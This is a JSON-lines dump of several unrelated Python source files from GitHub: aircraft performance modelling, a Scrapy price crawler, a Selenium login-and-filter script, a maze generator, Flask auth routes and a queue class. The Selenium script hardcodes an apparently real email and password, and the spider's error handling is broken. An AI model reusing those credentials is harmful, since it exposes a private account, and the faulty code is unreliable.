API.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29508559559","text":"\"\"\" BlueSky aircraft performance calculations.\"\"\"\r\nfrom xml.etree import ElementTree\r\nfrom math import *\r\nimport numpy as np\r\nfrom bluesky.tools.aero import ft, g0, rho0, kts, lbs, inch, sqft, fpm\r\n\r\nfrom .performance import esf, phases, calclimits, PHASE\r\nimport bluesky as bs\r\n\r\n# Register settings defaults\r\nbs.settings.set_variable_defaults(perf_path='performance/BS', verbose=False)\r\n\r\nclass CoeffBS:\r\n \"\"\"\r\n Coefficient class definition : get aircraft-specific coefficients from database\r\n Created by : Isabel Metz\r\n\r\n References:\r\n\r\n - D.P. Raymer. Aircraft Design: A Conceptual Approach. AIAA Education Series.\r\n American Institute of Aeronautics and Astronautics, Inc., Reston, U.S, fifth edition, 2012.\r\n - R. Babikian. The Historical Fuel Efficiency Characteristics of Regional Aircraft from\r\n Technological, Operational, and Cost Perspectives. Master's Thesis, Massachusetts\r\n Institute of Technology, Boston, U.S.\r\n \"\"\"\r\n\r\n def convert(self, value, unit):\r\n factors = {'kg': 1., 't':1000., 'lbs': lbs, 'N': 1., 'W': 1, \\\r\n 'm':1.,'km': 1000., 'inch': inch,'ft': ft, \\\r\n 'sqm': 1., 'sqft': sqft, 'sqin': 0.0254*0.0254 ,\\\r\n 'm/s': 1., 'km/h': 1./3.6, 'kts': kts, 'fpm': fpm, \\\r\n \"kg/s\": 1., \"kg/m\": 1./60., 'mug/J': 0.000001, 'mg/J': 0.001 ,\r\n \"kW\": 1000.,\"kN\":1000.,\r\n \"\":1.}\r\n\r\n if unit in factors:\r\n converted = factors[unit] * float(value)\r\n\r\n else:\r\n converted = float(value)\r\n if not self.warned:\r\n print(\"traf/perf.py convert function: Unit mismatch. 
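# --- Hedged reduction of the convert() pattern above: a pure dict lookup with
# a pass-through fallback, so an unknown unit warns once instead of crashing.
# Factor values are the standard SI conversions, trimmed to three units.
FACTORS = {"m": 1.0, "ft": 0.3048, "kts": 0.514444, "": 1.0}

def convert(value, unit):
    try:
        return FACTORS[unit] * float(value)
    except KeyError:
        print("unknown unit %r, passing value through" % unit)
        return float(value)

assert convert(10, "m") == 10.0
assert abs(convert(100, "ft") - 30.48) < 1e-9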
Could not find \", unit)\r\n self.warned = True\r\n\r\n return converted\r\n\r\n\r\n def coeff(self):\r\n\r\n # aircraft\r\n self.atype = [] # aircraft type\r\n self.j_ac = [] # list of all jet aircraft\r\n self.tp_ac = [] # list of all turboprop aircraft\r\n\r\n # engine\r\n self.etype = [] # jet / turboprop\r\n self.engines = [] # engine types avaliable per aircraft type\r\n self.j_engines = [] # engine types for jet aircraft\r\n self.tp_engines= [] # engine types for turboprop aircraft\r\n self.n_eng = [] # number of engines\r\n\r\n # weights\r\n self.MTOW = [] # maximum takeoff weight\r\n\r\n # speeds\r\n self.max_spd = [] # maximum CAS\r\n self.cr_Ma = [] # nominal cruise Mach at 35000 ft\r\n self.cr_spd = [] # cruise speed\r\n self.max_Ma = [] # maximum Mach\r\n self.gr_acc = [] # ground acceleration\r\n self.gr_dec = [] # ground deceleration\r\n\r\n # limits\r\n self.vmto = [] # minimum speed during takeoff\r\n self.vmld = [] # minimum speed during landing\r\n self.clmax_cr = [] # max. cruise lift coefficient\r\n self.max_alt = [] # maximum altitude\r\n\r\n # dimensions\r\n #span = [] # wing span\r\n self.Sref = [] # reference wing area\r\n #wet_area = [] # wetted area\r\n\r\n # aerodynamics\r\n #Cfe = [] # equivalent skin friction coefficient (Raymer, p.428)\r\n self.CD0 = [] # parasite drag coefficient\r\n #oswald = [] # oswald factor\r\n self.k = [] # induced drag factor\r\n\r\n # scaling factors for drag (FAA_2005 SAGE)\r\n # order of flight phases: TO, IC, CR ,AP, LD ,LD gear\r\n self.d_CD0j = [1.476, 1.143,1.0, 1.957, 3.601, 1.037]\r\n self.d_kj = [1.01, 1.071, 1.0 ,0.992, 0.932, 1.0]\r\n self.d_CD0t = [1.220, 1.0, 1.0, 1.279, 1.828, 0.496]\r\n self.d_kt = [0.948, 1.0, 1.0, 0.94, 0.916, 1.0]\r\n\r\n # bank angles per phase. Order: TO, IC, CR, AP, LD. 
Currently already in CTraffic\r\n # self.bank = np.deg2rad(np.array([15,35,35,35,15]))\r\n\r\n # flag: did we already warn about invalid input unit?\r\n self.warned = False\r\n\r\n # parse AC files\r\n\r\n path = bs.resource(bs.settings.perf_path) / 'BS/aircraft'\r\n for fname in path.iterdir():\r\n acdoc = ElementTree.parse(fname)\r\n\r\n #actype = doc.find('ac_type')\r\n self.atype.append(acdoc.find('ac_type').text)\r\n\r\n # engine\r\n self.etype.append(int(acdoc.find('engine/eng_type').text))\r\n\r\n # store jet and turboprop aircraft in seperate lists for accessing specific engine data\r\n if int(acdoc.find('engine/eng_type').text) ==1:\r\n self.j_ac.append(acdoc.find('ac_type').text)\r\n\r\n elif int(acdoc.find('engine/eng_type').text) ==2:\r\n self.tp_ac.append(acdoc.find('ac_type').text)\r\n\r\n self.n_eng.append(float(acdoc.find('engine/num_eng').text))\r\n\r\n engine = []\r\n for eng in acdoc.findall('engine/eng'):\r\n engine.append(eng.text)\r\n\r\n # weights\r\n MTOW = self.convert(acdoc.find('weights/MTOW').text, acdoc.find('weights/MTOW').attrib['unit'])\r\n\r\n self.MTOW.append(MTOW)\r\n\r\n MLW= self.convert(acdoc.find('weights/MLW').text, acdoc.find('weights/MLW').attrib['unit'])\r\n\r\n # dimensions\r\n # wingspan\r\n span = self.convert(acdoc.find('dimensions/span').text, acdoc.find('dimensions/span').attrib['unit'])\r\n # reference surface area\r\n S_ref = self.convert(acdoc.find('dimensions/wing_area').text, acdoc.find('dimensions/wing_area').attrib['unit'])\r\n self.Sref.append(S_ref)\r\n\r\n # wetted area\r\n S_wet = self.convert(acdoc.find('dimensions/wetted_area').text, acdoc.find('dimensions/wetted_area').attrib['unit'])\r\n\r\n # speeds\r\n # cruise Mach number\r\n crma = acdoc.find('speeds/cr_MA')\r\n if float(crma.text) == 0.0:\r\n # to be refined\r\n self.cr_Ma.append(0.8)\r\n else:\r\n self.cr_Ma.append(float(crma.text))\r\n\r\n # cruise TAS\r\n crspd = acdoc.find('speeds/cr_spd')\r\n\r\n # to be refined\r\n if float(crspd.text) == 0.0:\r\n self.cr_spd.append(self.convert(250, 'kts'))\r\n else:\r\n self.cr_spd.append(self.convert(acdoc.find('speeds/cr_spd').text, acdoc.find('speeds/cr_spd').attrib['unit']))\r\n\r\n # ground acceleration\r\n # values are based on statistical ADS-B evaluations\r\n # turboprops: 2.12 m/s^2 acceleration,1.12m/s^2 deceleration\r\n if int(acdoc.find('engine/eng_type').text) == 2:\r\n self.gr_acc.append(2.12)\r\n self.gr_dec.append(1.12)\r\n\r\n # turbofans\r\n else:\r\n\r\n # turbofans with two engines: 1.94 m/^2, 1.265m/s^2 deceleration\r\n if float(acdoc.find('engine/num_eng').text) == 2. 
:\r\n self.gr_acc.append(1.94)\r\n self.gr_dec.append(1.265)\r\n # turbofans with four engines: 1.68 m/s^2, 1.131 m/s^2 deceleration\r\n # assumption: aircraft with three engines have the same value\r\n else :\r\n self.gr_acc.append(1.68)\r\n self.gr_dec.append(1.131)\r\n\r\n\r\n\r\n # limits\r\n # min takeoff speed\r\n tospd = acdoc.find('speeds/to_spd')\r\n # no take-off speed given: calculate via cl_max\r\n if float (tospd.text) == 0.:\r\n clmax_to = float(acdoc.find('aerodynamics/clmax_to').text)\r\n self.vmto.append (sqrt((2*g0)/(S_ref*clmax_to))) # influence of current weight and density follows in CTraffic\r\n else:\r\n tospd = self.convert(acdoc.find('speeds/to_spd').text, acdoc.find('speeds/to_spd').attrib['unit'])\r\n self.vmto.append(tospd/(1.13*sqrt(MTOW/rho0))) # min spd according to CS-/FAR-25.107\r\n # min ic, cr, ap speed\r\n clmaxcr = (acdoc.find('aerodynamics/clmax_cr'))\r\n self.clmax_cr.append(float(clmaxcr.text))\r\n\r\n # min landing speed\r\n ldspd = acdoc.find('speeds/ld_spd')\r\n if float(ldspd.text) == 0. :\r\n clmax_ld = (acdoc.find('aerodynamics/clmax_ld'))\r\n self.vmld.append (sqrt((2*g0)/(S_ref*float(clmax_ld.text)))) # influence of current weight and density follows in CTraffic\r\n else:\r\n ldspd = self.convert(acdoc.find('speeds/ld_spd').text, acdoc.find('speeds/ld_spd').attrib['unit'])\r\n clmax_ld = MLW*g0*2/(rho0*(ldspd*ldspd)*S_ref)\r\n self.vmld.append(ldspd/(1.23*sqrt(MLW/rho0)))\r\n # maximum CAS\r\n maxspd = acdoc.find('limits/max_spd')\r\n if float(maxspd.text) == 0.0:\r\n # to be refined\r\n self.max_spd.append(400.)\r\n else:\r\n self.max_spd.append(self.convert(acdoc.find('limits/max_spd').text, acdoc.find('limits/max_spd').attrib['unit']))\r\n # maximum Mach\r\n maxma = acdoc.find('limits/max_MA')\r\n if float(maxma.text) == 0.0:\r\n # to be refined\r\n self.max_Ma.append(0.8)\r\n else:\r\n self.max_Ma.append(float(maxma.text))\r\n\r\n\r\n # maximum altitude\r\n maxalt = acdoc.find('limits/max_alt')\r\n if float(maxalt.text) == 0.0:\r\n #to be refined\r\n self.max_alt.append(11000.)\r\n else:\r\n self.max_alt.append(self.convert(acdoc.find('limits/max_alt').text, acdoc.find('limits/max_alt').attrib['unit']))\r\n\r\n # aerodynamics\r\n\r\n # parasitic drag - according to Raymer, p. 429\r\n Cfe = float((acdoc.find('aerodynamics/Cfe').text))\r\n self.CD0.append (Cfe*S_wet/S_ref)\r\n\r\n # induced drag\r\n oswald = acdoc.find('aerodynamics/oswald')\r\n if float(oswald.text) == 0.0:\r\n # math method according to Obert 2009, p.542: e = 1/(1.02+0.09*pi*AR) combined with Nita 2012, p.2\r\n self.k.append(1.02/(pi*(span*span/S_ref))+0.009)\r\n else:\r\n oswald = float(acdoc.find('aerodynamics/oswald').text)\r\n self.k.append(1/(pi*oswald*(span*span/S_ref)))\r\n\r\n #users = doc.find( 'engine' )\r\n #for node in users.getiterator():\r\n # print node.tag, node.attrib, node.text, node.tail\r\n\r\n # to collect avaliable engine types per aircraft\r\n # 2do!!! access via console so user may choose preferred engine\r\n # for data file: statistics provided by flightglobal for first choice\r\n # if not declared differently: first engine is taken!\r\n self.engines.append(engine)\r\n\r\n if int(acdoc.find('engine/eng_type').text) ==1:\r\n self.j_engines.append(engine)\r\n\r\n elif int(acdoc.find('engine/eng_type').text) ==2:\r\n self.tp_engines.append(engine)\r\n\r\n # engines\r\n self.enlist = [] # list of all engines\r\n self.jetenlist = [] # list of all jet engines\r\n self.propenlist = [] # list of all turbopropengines\r\n\r\n # a. 
jet aircraft\r\n self.rated_thrust = [] # rated Thrust (one engine)\r\n self.ffto = [] # fuel flow takeoff\r\n self.ffcl = [] # fuel flow climb\r\n self.ffcr = [] # fuel flow cruise\r\n self.ffid = [] # fuel flow idle\r\n self.ffap = [] # fuel flow approach\r\n self.SFC = [] # specific fuel flow cruise\r\n\r\n\r\n # b. turboprops\r\n self.P = [] # max. power (Turboprops, one engine)\r\n self.PSFC_TO = [] # SFC takeoff\r\n self.PSFC_CR = [] # SFC cruise\r\n\r\n # parse engine files\r\n path = bs.resource(bs.settings.perf_path) / 'BS/engines/'\r\n for fname in path.iterdir():\r\n endoc = ElementTree.parse(fname)\r\n self.enlist.append(endoc.find('engines/engine').text)\r\n\r\n # thrust\r\n # a. jet engines\r\n if int(endoc.find('engines/eng_type').text) ==1:\r\n\r\n # store engine in jet-engine list\r\n self.jetenlist.append(endoc.find('engines/engine').text)\r\n # thrust\r\n self.rated_thrust.append(self.convert(endoc.find('engines/Thr').text, endoc.find('engines/Thr').attrib['unit']))\r\n # bypass ratio\r\n BPRc = int(endoc.find('engines/BPR_cat').text)\r\n # different SFC for different bypass ratios (reference: Raymer, p.36)\r\n SFC = [14.1, 22.7, 25.5]\r\n self.SFC.append(SFC[BPRc])\r\n\r\n # fuel flow: Takeoff, climb, cruise, approach, idle\r\n self.ffto.append(self.convert(endoc.find('ff/ff_to').text, endoc.find('ff/ff_to').attrib['unit']))\r\n self.ffcl.append(self.convert(endoc.find('ff/ff_cl').text, endoc.find('ff/ff_cl').attrib['unit']))\r\n self.ffcr.append(self.convert(endoc.find('ff/ff_cr').text, endoc.find('ff/ff_cr').attrib['unit']))\r\n self.ffap.append(self.convert(endoc.find('ff/ff_ap').text, endoc.find('ff/ff_ap').attrib['unit']))\r\n self.ffid.append(self.convert(endoc.find('ff/ff_id').text, endoc.find('ff/ff_id').attrib['unit']))\r\n\r\n # b. 
turboprop engines\r\n elif int(endoc.find('engines/eng_type').text) ==2:\r\n\r\n # store engine in prop-engine list\r\n self.propenlist.append(endoc.find('engines/engine').text)\r\n\r\n # power\r\n self.P.append(self.convert(endoc.find('engines/Power').text, endoc.find('engines/Power').attrib['unit']))\r\n # specific fuel consumption: takeoff and cruise\r\n PSFC_TO = self.convert(endoc.find('SFC/SFC_TO').text, endoc.find('SFC/SFC_TO').attrib['unit'])\r\n self.PSFC_TO.append(PSFC_TO)\r\n # according to Babikian (function based on PSFC in [mug/J]), input in [kg/J]\r\n self.PSFC_CR.append(self.convert((0.7675*PSFC_TO*1000000.0 + 23.576), 'mug/J'))\r\n # print PSFC_TO, self.PSFC_CR\r\n\r\n # Turn relevant ones into numpy arrays\r\n\r\n self.MTOW=np.array(self.MTOW)\r\n self.Sref=np.array(self.Sref)\r\n self.etype=np.array(self.etype)\r\n self.cr_Ma=np.array(self.cr_Ma)\r\n self.cr_spd=np.array(self.cr_spd)\r\n self.gr_acc=np.array(self.gr_acc)\r\n self.gr_dec=np.array(self.gr_dec)\r\n self.vmto=np.array(self.vmto)\r\n self.vmld=np.array(self.vmld)\r\n self.max_Ma=np.array(self.max_Ma)\r\n self.max_spd=np.array(self.max_spd)\r\n self.max_alt=np.array(self.max_alt)\r\n self.CD0=np.array(self.CD0)\r\n self.k=np.array(self.k)\r\n self.clmax_cr=np.array(self.clmax_cr)\r\n self.n_eng=np.array(self.n_eng)\r\n self.P=np.array(self.P)\r\n self.PSFC_TO=np.array(self.PSFC_TO)\r\n self.PSFC_CR=np.array(self.PSFC_CR)\r\n self.rated_thrust=np.array(self.rated_thrust)\r\n self.SFC=np.array(self.SFC)\r\n self.ffto=np.array(self.ffto)\r\n self.ffcl=np.array(self.ffcl)\r\n self.ffcr=np.array(self.ffcr)\r\n self.ffid=np.array(self.ffid)\r\n self.ffap=np.array(self.ffap)\r\n","repo_name":"TUDelft-CNS-ATM/bluesky","sub_path":"bluesky/traffic/performance/legacy/coeff_bs.py","file_name":"coeff_bs.py","file_ext":"py","file_size_in_byte":15336,"program_lang":"python","lang":"en","doc_type":"code","stars":299,"dataset":"github-code","pt":"72"} +{"seq_id":"15871642219","text":"import json\nimport locale\nimport re\nfrom datetime import datetime\n\nimport requests\nfrom oster.custom_settings.oster_settings import settings\nfrom scrapy.http import Request\nfrom scrapy.spiders import SitemapSpider\n\nlocale.setlocale(locale.LC_ALL, 'en_US.UTF-8')\n\n\nclass OsterSpider(SitemapSpider):\n name = 'oster_crawler'\n allowed_domains = ['www.oster.com.br']\n sitemap_urls = ['https://www.oster.com.br/sitemap/sitemap.xml']\n sitemap_rules = [('', 'parse_listpage')]\n\n sitemap_follow = [\n r'[\\d\\w:/.](category-)[\\d\\w:/.]'\n ]\n\n other_urls: list[str] = []\n\n custom_settings = settings()\n\n def parse_listpage(self, response):\n urlspage_jscript = []\n\n var_pagecount = response.xpath(\n '//*/div/script[contains(@type,\"text/javascript\")]/text()'\n ).getall()\n for text in var_pagecount:\n char_identif = \"var pagecount\"\n prefix_identif = \").load('\"\n sufix_identif = \"' + pageclickednumber\"\n if char_identif in text:\n url_standard_jscript = text.split(\n prefix_identif)[-1].split(sufix_identif)[0]\n url_standard_jscript = url_standard_jscript.strip()\n url_standard_jscript = re.sub(\n \"(PS=\\\\d+)\", \"PS=50\", url_standard_jscript)\n\n page = 1\n\n while True:\n page_jscript = \"\".join(\n (\"https://\", self.allowed_domains[0],\n url_standard_jscript, str(page)))\n\n page += 1\n\n payload = {}\n headers = {}\n\n request_nextpage = requests.get(\n url=page_jscript, headers=headers, data=payload)\n size_nextpage = len(request_nextpage.text)\n\n if size_nextpage < 10:\n break\n urlspage_jscript.append(page_jscript)\n\n 
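# --- Hedged generic form of the probe loop above: request page N until the
# endpoint returns an (almost) empty body. The URL template and the
# 10-character threshold are illustrative assumptions, not the real VTEX API.
import requests

def collect_pages(url_template, min_body=10, max_pages=100):
    pages = []
    for page in range(1, max_pages + 1):
        body = requests.get(url_template.format(page=page)).text
        if len(body) < min_body:         # empty page -> walked past the end
            break
        pages.append(body)
    return pages

# pages = collect_pages("https://example.com/buscapagina?PS=50&PageNumber={page}")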
for url_jscript in urlspage_jscript:\n yield Request(url=url_jscript, callback=self.parse)\n\n def parse(self, response):\n url_products = response.xpath(\n '//*[contains(@class,\"shelf-product\")]/*/h3/a/@href').getall()\n for url in url_products:\n yield Request(url=url, callback=self.parse_product)\n\n def parse_product(self, response):\n json_addData = response.xpath('//*/script/text()').getall()\n for text in json_addData:\n prefix_identif = \"vtex.events.addData(\"\n sufix_identif = \");\"\n if prefix_identif in text:\n data_json = text.split(\n prefix_identif)[-1].split(sufix_identif)[0]\n data_json = data_json.strip()\n data_json = json.loads(data_json)\n\n pageUrl = data_json[\"pageUrl\"]\n\n if \"404\" in pageUrl:\n raise '=== Produto Esgotado ==='\n\n for text in json_addData:\n prefix_identif_2 = \"skuJson_0 =\"\n sufix_identif_2 = \";CATALOG_SDK\"\n if prefix_identif_2 in text:\n data_json_2 = text.split(\n prefix_identif_2)[-1].split(sufix_identif_2)[0]\n data_json_2 = data_json_2.strip()\n data_json_2 = json.loads(data_json_2)\n\n price = data_json[\"productPriceTo\"]\n try:\n price = locale.atof(price)\n except ValueError:\n pass\n name = data_json_2[\"name\"]\n try:\n gtin = data_json[\"productEans\"]\n except None:\n gtin = None\n sku = [key for key, value in data_json[\"skuStocks\"].items()]\n\n currency = data_json_2[\"skus\"][0][\"taxFormated\"].split()[0]\n seller = data_json_2[\"skus\"][0][\"seller\"]\n category = data_json[\"productCategoryName\"]\n image = data_json_2[\"skus\"][0][\"image\"]\n created_at = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n yield {\n \"gtin\": gtin,\n \"name\": name,\n \"currency\": currency,\n \"price\": price,\n \"category\": category,\n \"sku\": sku,\n \"seller\": seller,\n \"pageUrl\": pageUrl,\n \"image\": image,\n \"created_at\": created_at,\n }\n","repo_name":"oliveira-bs/Crawler_Oster","sub_path":"oster/spiders/oster.py","file_name":"oster.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11636533122","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nPATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\nkodok = webdriver.Chrome(PATH)\n\nkodok.get(\"http://kodok.me/\")\t\t\t\t\t#open website Kodok\nprint(kodok.title)\n\n#==========================LOGIN=================================\nemail = kodok.find_element_by_id('email')\nemail.send_keys(\"aufar.rizqi@artajasa.co.id\")\n\npwd = kodok.find_element_by_id(\"password\")\npwd.send_keys(\"opensesaMe16?!\")\n\nlogin = kodok.find_element_by_name(\"login\")\nlogin.click()\n\n#=======================CHOOSE ROLE==============================\ntry:\n\t#pilih role yg mau dimasukkin. 
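# --- Hedged restatement of the wait-then-select pattern the script above
# repeats for every filter; the locator id and label are placeholders, not
# Kodok's real element ids.
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait, Select
from selenium.webdriver.support import expected_conditions as EC

def pick_option(driver, dropdown_id, label, timeout=10):
    element = WebDriverWait(driver, timeout).until(
        EC.presence_of_element_located((By.ID, dropdown_id))
    )
    Select(element).select_by_visible_text(label)

# pick_option(kodok, "filter-pic", "YBP")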
pilihan id: login_manager / login_admin / login_engineer\n\trole = WebDriverWait(kodok, 10).until(\n\t\tEC.presence_of_element_located((By.ID, \"login_manager\"))\n\t)\n\n\trole.click()\t#klik tombol rolenya\n\n\tlistp = WebDriverWait(kodok, 10).until(\n\t\tEC.presence_of_element_located((By.ID, \"listpage\"))\n\t)\n\n\tlistp.click()\t#klik tombol rolenya\n\n#########################################################################Generate Excel\n\telement = WebDriverWait(kodok, 10).until(\n\t\tEC.presence_of_element_located((By.ID, \"tabel\"))\n\t)\n\n\texcel = element.find_element_by_xpath(\"//a[@href='/manager/projects/export']\")\n\t#excel.click()\n#########################################################################Filter\n\telement = kodok.find_element_by_id(\"filter\")\n\textend = element.find_element_by_xpath(\"//button[@class='btn btn-tool']\")\t\t#find the \"+\" button to extend\n\n\textend.click()\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#extend\n\n\tfilters = WebDriverWait(kodok, 10).until(\n\t\tEC.presence_of_element_located((By.XPATH, \"//div[@class='card-body']\"))\t\t#take the filter body to access the dropdown\n\t)\n#========================================================================PIC\n\tdropdown = filters.find_element_by_id(\"filter-pic\")\t\t\t\t\t\t\t\t#ambil filter pic\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"YBP\")\n#========================================================================Product\n\tdropdown = filters.find_element_by_id(\"filter-product\")\t\t\t\t\t\t\t#ambil filter product\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"BersamaKU\")\n#========================================================================Mitra\n\tdropdown = filters.find_element_by_id(\"filter-mitra\")\t\t\t\t\t\t\t#ambil filter mitra\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"Western Union\")\n#========================================================================Project\n\tdropdown = filters.find_element_by_id(\"filter-namap\")\t\t\t\t\t\t\t#ambil filter nama project\n\n\tdropdown.send_keys(\"Remittance\")\n\tdropdown.clear()\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#kalo mau ngosongin filter bentuk textbox\n#========================================================================Jenis Project\n\tdropdown = filters.find_element_by_id(\"filter-ptype\")\t\t\t\t\t\t\t#ambil filter jenis project\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"Sertifikasi\")\n#========================================================================Status\n\tdropdown = filters.find_element_by_id(\"filter-pstat\")\t\t\t\t\t\t\t#ambil filter status project\n\tselect = Select(dropdown)\n\n\tselect.select_by_visible_text(\"Pengujian Done\")\n\ttime.sleep(2)\n\tselect.select_by_visible_text(\"Drop\")\n\t#select.select_by_visible_text(\"-\")\t\t\t\t\t\t\t\t\t\t\t\t#kalo mau ngosongin filter bentuk select\n#########################################################################Logout\n\ttime.sleep(3)\n\telement = kodok.find_element_by_id(\"rn-dropdown\")\n\telement.click()\n\n\tlogout = element.find_element_by_xpath(\"//a[@class='dropdown-item' and @href='/logout']\")\n\tlogout.click()\n\nfinally:\n\ttime.sleep(3)\n\tkodok.quit()","repo_name":"aufarr16/KodokSelenium","sub_path":"Python/By Page/Manager/ListProject.py","file_name":"ListProject.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"975371702","text":"# prims 
algorithm\n\nimport random\nclass Maze:\n '''\n * 1 repsesents wall, 0 represents path\n '''\n def __init__(self, width, height) -> None:\n self.width = width\n self.height = height\n # self.maze = self.generate_maze(width, height)\n \n def prims_algorithm(self):\n # prims algorithm to generate maze\n width = self.width\n height = self.height\n \n # Initialize maze with walls\n maze = [['1' for _ in range(width)] for _ in range(height)]\n \n # Choose a random starting cell\n start_x = random.randint(0, width - 1)\n start_y = random.randint(0, height - 1)\n maze[start_y][start_x] = '0'\n \n # List of walls to consider\n walls = [(start_x + 1, start_y), (start_x - 1, start_y),\n (start_x, start_y + 1), (start_x, start_y - 1)]\n \n while walls:\n random_wall = random.choice(walls)\n x, y = random_wall\n \n # Count the number of neighbors with paths\n neighbors = 0\n if x > 0 and maze[y][x - 1] == '0':\n neighbors += 1\n if x < width - 1 and maze[y][x + 1] == '0':\n neighbors += 1\n if y > 0 and maze[y - 1][x] == '0':\n neighbors += 1\n if y < height - 1 and maze[y + 1][x] == '0':\n neighbors += 1\n \n if neighbors == 1:\n maze[y][x] = '0'\n \n # Add neighboring walls to the list\n if x > 0:\n walls.append((x - 1, y))\n if x < width - 1:\n walls.append((x + 1, y))\n if y > 0:\n walls.append((x, y - 1))\n if y < height - 1:\n walls.append((x, y + 1))\n \n walls.remove(random_wall)\n \n return maze\n\nif __name__ == '__main__':\n # Example usage\n def print_maze(maze):\n for row in maze:\n print(' '.join(row))\n\n \n maze_width = 21\n maze_height = 21\n maze = Maze(maze_width, maze_height).prims_algorithm()\n print_maze(maze)\n","repo_name":"AGI-RESEARCH-SEC/snake-game-env","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17658458580","text":"from flask import Blueprint, request\n\nfrom services.auth import AuthService\nfrom utills.response_code import RESPONSE_CODE\nfrom utills.decorators import login_required, header_required, response_formatted\n\nauth_blueprint = Blueprint(name='auth', import_name=__name__)\n\n\n@auth_blueprint.route(rule='/validate', methods=['POST'], endpoint='validate_token')\n@header_required\n@login_required\n@response_formatted\ndef validate_token():\n email = request.headers.get('x-user-email')\n access_token = request.headers.get('x-access-token')\n auth_service = AuthService(access_token=access_token, email=email)\n\n item, code = auth_service.validate_access_token()\n if not item:\n return RESPONSE_CODE[code], None, 400\n\n return RESPONSE_CODE[code], item, 200\n\n\n@auth_blueprint.route(rule='/refresh', methods=['POST'], endpoint='refresh_token')\n@header_required\n@login_required\n@response_formatted\ndef refresh_token():\n email = request.headers.get('x-user-email')\n access_token = request.headers.get('access_token')\n auth_service = AuthService(access_token=access_token, email=email)\n\n item, code = auth_service.refresh_access_token()\n if not item:\n return RESPONSE_CODE[code], None, 400\n\n return RESPONSE_CODE[code], item, 200\n","repo_name":"JeongHM/BKL","sub_path":"controllers/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32030211291","text":"class Queue:\n def __init__(self):\n self.__queue = []\n self.__front=0\n self.__count=0\n \n def enqueue(self,item):\n 
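# --- Hedged companion check (not in the original): confirm two open cells of
# a generated maze are connected with a plain BFS over the '0' cells. The toy
# grid below is hand-made, not Prim output.
from collections import deque

def reachable(maze, start, goal):
    h, w = len(maze), len(maze[0])
    seen, todo = {start}, deque([start])
    while todo:
        x, y = todo.popleft()
        if (x, y) == goal:
            return True
        for nx, ny in ((x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)):
            if 0 <= nx < w and 0 <= ny < h and maze[ny][nx] == '0' and (nx, ny) not in seen:
                seen.add((nx, ny))
                todo.append((nx, ny))
    return False

toy = ['000', '110', '000']
assert reachable(toy, (0, 0), (0, 2))    # around the wall on the right side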
self.__queue.append(item)\n self.__count+=1\n \n def dequeue(self):\n if self.__count==0:\n return \"Empty queue\"\n elem=self.__queue[self.__front]\n self.__front+=1\n self.__count-=1\n return elem\n def getFront(self):\n if self.__count == 0:\n return \"Empty queue\"\n return self.__queue[self.__front]\n def size(self):\n return self.__count\n def isEmpty(self):\n return self.size() == 0\n \n \nq=Queue()\nq.enqueue(1)\nq.enqueue(2)\nq.enqueue(3)\nq.dequeue()\nprint(q.getFront())\nprint(q.size())\nprint(q.isEmpty())\n\n","repo_name":"AtharvaAshar/DSA-Python","sub_path":"Queues/queueUsingArray.py","file_name":"queueUsingArray.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12370900427","text":"import mjdb\nimport sgws\nimport config\nimport common as cmn\nimport pandas as pd\nimport datetime as dt\nimport sgHelpers as hlp\nfrom sqlalchemy import create_engine\n\nENGINE = create_engine(config.config('config.ini','postgres_alchemy')['url'])\nLOGDIR = 'etl_sagitta'\nFILE = 'payees'\n\nlf = cmn.log_filer(LOGDIR,FILE)\n\ndef payees_row(sagitem,soup):\n row = {\n 'sagitem':sagitem,\n 'audit_entry_dt':int(soup.find('AuditEntryDt').text) if soup.find('AuditEntryDt') else None,\n 'audit_time':int(soup.find('AuditTime').text) if soup.find('AuditTime') else None,\n 'mga':soup.find('MGA').text if soup.find('MGA') else None\n }\n for t in ('audit_staff_cd','audit_cd','audit_history_record_number','audit_program','audit_effective_dt','payee_name','initial_dt','contact_name','addr_1','addr_2','postal_code','postal_extension_code','city','state_prov_cd','phone_1_number','phone_2_number','agency_cd','pay_method_cd','num_days','fax_number','phone_1_extention_number','phone_2_extention_number','off_dt','direct_bill_ind','release_ind','email_addr','description','global','payee_responsible_for_filing','tax_fee_payee'):\n tag = ''.join([x.capitalize() for x in t.split('_')])\n row[t] = soup.find(tag).text if soup.find(tag) else None \n return row \n\ndef cov_ins_percent_info_row(sagitem,lis,soup):\n row = {\n 'sagitem':sagitem,\n 'lis':lis,\n 'db_new_pct':soup.find('DBNewPct').text if soup.find('DBNewPct') else None,\n 'db_ren_pct':soup.find('DBRenPct').text if soup.find('DBRenPct') else None\n }\n for t in ('coverage_cd','agency_new_pct','agency_ren_pct','begin_dt','end_dt','standard_comm_ind','insurer_cd','grading_from_amt','grading_to_amt','commission_type_ind','comm_div','comm_dept'):\n tag = ''.join([x.capitalize() for x in 